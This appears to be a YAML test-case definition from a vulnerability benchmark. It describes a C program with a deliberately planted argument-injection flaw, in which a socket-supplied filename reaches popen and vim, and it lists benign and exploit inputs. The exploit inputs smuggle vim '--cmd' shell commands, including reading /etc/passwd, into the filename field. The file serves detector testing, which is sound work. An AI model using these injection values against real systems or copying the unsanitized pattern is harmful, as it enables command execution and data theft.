io_pair:
  benigns:
    - inputs:
        - value_type_enum: 0
          value: /opt/stonesoup/workspace/testData/vim_inputs/sample1.txt
          stage: co_process
          value_type: USE_TEXT_DIRECTLY
          port: 8887
          stage_enum: 1
          address: ss-localhost
          id: source
          ordinal: 1
          source_enum: 5
          value_encoding: none
          source: socket_input
        - value_type_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          value_type: USE_TEXT_DIRECTLY
          stage_enum: 0
          source_enum: 3
          value_encoding: none
          stage: pre_process
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          source: file_content_input
          ordinal: 1
        - ordinal: 2
          stage: pre_process
          value_type: USE_TEXT_DIRECTLY
          source_enum: 3
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample1.txt
          source: file_content_input
          value_type_enum: 0
          stage_enum: 0
          value: !<!> hello World!
          value_encoding: none
    - inputs:
        - value_type: USE_TEXT_DIRECTLY
          source_enum: 5
          ordinal: 1
          stage: co_process
          address: ss-localhost
          port: 8887
          id: source
          value_encoding: none
          stage_enum: 1
          source: socket_input
          value: /opt/stonesoup/workspace/testData/vim_inputs/sample2.txt
          value_type_enum: 0
        - name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          value_type: USE_TEXT_DIRECTLY
          stage_enum: 0
          source_enum: 3
          stage: pre_process
          source: file_content_input
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          value_type_enum: 0
          value_encoding: none
          ordinal: 1
        - source: file_content_input
          ordinal: 2
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample2.txt
          value: !<!> "hello?\nhello.\nhello!\nhello..."
          value_type: USE_TEXT_DIRECTLY
          stage: pre_process
          source_enum: 3
          value_type_enum: 0
          stage_enum: 0
          value_encoding: none
    - inputs:
        - port: 8887
          id: source
          stage_enum: 1
          value_type: USE_TEXT_DIRECTLY
          value_type_enum: 0
          value: /opt/stonesoup/workspace/testData/vim_inputs/sample3.txt
          value_encoding: none
          address: ss-localhost
          source_enum: 5
          ordinal: 1
          stage: co_process
          source: socket_input
        - source_enum: 3
          source: file_content_input
          value_encoding: none
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          value_type_enum: 0
          value_type: USE_TEXT_DIRECTLY
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          stage_enum: 0
          ordinal: 1
          stage: pre_process
        - source: file_content_input
          value: !<!> "Hello again, hello.  Just called to say hello.\n\nYou had me at \"hello\".\n\n"
          value_type: USE_TEXT_DIRECTLY
          source_enum: 3
          ordinal: 2
          value_type_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample3.txt
          value_encoding: none
          stage_enum: 0
          stage: pre_process
  exploits:
    - inputs:
        - value: --cmd 'silent !cat /etc/passwd' /opt/stonesoup/workspace/testData/vim_inputs/sample1.txt
          source_enum: 5
          id: source
          ordinal: 1
          stage: co_process
          stage_enum: 1
          source: socket_input
          port: 8887
          value_encoding: none
          value_type_enum: 0
          value_type: USE_TEXT_DIRECTLY
          address: ss-localhost
        - value_encoding: none
          value_type: USE_TEXT_DIRECTLY
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          source_enum: 3
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          ordinal: 1
          stage_enum: 0
          value_type_enum: 0
          stage: pre_process
          source: file_content_input
        - value_type: USE_TEXT_DIRECTLY
          value_type_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample1.txt
          stage: pre_process
          stage_enum: 0
          source_enum: 3
          ordinal: 2
          value: !<!> hello World!
          value_encoding: none
          source: file_content_input
    - inputs:
        - source_enum: 5
          port: 8887
          id: source
          stage_enum: 1
          value_encoding: none
          source: socket_input
          stage: co_process
          address: ss-localhost
          value: --cmd 'silent !ls -la .' /opt/stonesoup/workspace/testData/vim_inputs/sample2.txt
          ordinal: 1
          value_type_enum: 0
          value_type: USE_TEXT_DIRECTLY
        - value_encoding: none
          stage_enum: 0
          name: !<!> $SS_TC_ROOT/testData/vim_scripts/hello.vim
          source: file_content_input
          value_type_enum: 0
          stage: pre_process
          value: !<!> ":silent %s/hello/Hello/g\n:wq\n"
          source_enum: 3
          value_type: USE_TEXT_DIRECTLY
          ordinal: 1
        - name: !<!> $SS_TC_ROOT/testData/vim_inputs/sample2.txt
          value_type_enum: 0
          value_encoding: none
          stage: pre_process
          source_enum: 3
          ordinal: 2
          stage_enum: 0
          value_type: USE_TEXT_DIRECTLY
          value: !<!> "hello?\nhello.\nhello!\nhello..."
          source: file_content_input
  base_inputs:
    - source: socket_input
      source_enum: 5
      stage: co_process
      stage_enum: 1
      id: source
      ordinal: 1
      address: ss-localhost
      port: 8887
  description: "This weakness takes a filename from an untrusted source and uses a subprocess (via popen) to perform a search and replace of the text \"hello\" with \"Hello\".  The untrusted input is not properly sanitized, and may be used to perform an argument injection on the base command in order to run additional commands or functions.\n"
code_complexity_features:
  - function_name: stonesoup_handle_taint
    line_number: 0
    feature_group: source_taint
    feature: SOCKET
    file_name: /tmp/tmp2hoauN_ss_testcase/src-rose/ui/gtk/main_statusbar.c
  - file_name: /tmp/tmp2hoauN_ss_testcase/src-rose/ui/gtk/main_statusbar.c
    function_name: stonesoup_handle_taint
    line_number: 0
    feature_group: data_type
    feature: simple
  - file_name: /tmp/tmp2hoauN_ss_testcase/src-rose/ui/gtk/main_statusbar.c
    function_name: stonesoup_handle_taint
    line_number: 0
    feature_group: data_flow
    feature: index_alias_50
  - file_name: /tmp/tmp2hoauN_ss_testcase/src-rose/ui/gtk/main_statusbar.c
    line_number: 0
    function_name: stonesoup_handle_taint
    feature_group: control_flow
    feature: indirectly_recursive
description: "Creating test case using base program.\nAdded a Socket Server to accept communication from untrusted source.\nCompleted injection.\n"